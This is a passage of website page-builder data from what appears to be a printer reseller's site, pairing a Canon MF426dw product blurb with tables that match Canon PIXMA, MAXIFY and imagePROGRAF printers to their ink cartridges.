MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td><td>Maintenance Cartridge MC-20<\\/td><\\/tr><tr><td>PFI-50 (Blue)<\\/td><\\/tr><tr><td>PFI-50 (Chroma Optimizer)<\\/td><\\/tr><tr><td>PFI-50 (Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Gray)<\\/td><\\/tr><tr><td>PFI-50 (Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Matte Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Photo Gray)<\\/td><\\/tr><tr><td>PFI-50 (Photo Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Red)<\\/td><\\/tr><tr><td>PFI-50 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td><td>CL-98 (Colour)<\\/td><\\/tr><tr><td>PG-88 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td><td>CLI-8 (Black)<\\/td><\\/tr><tr><td>CLI-8 (Cyan)<\\/td><\\/tr><tr><td>CLI-8 (Magenta)<\\/td><\\/tr><tr><td>CLI-8 (Yellow)<\\/td><\\/tr><tr><td>PGI-5 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td>PGI-755XXL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td>PGI-755XXL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>CL-746XL (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><tr><td>PG-745XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>CL-746XL (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><tr><td>PG-745XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 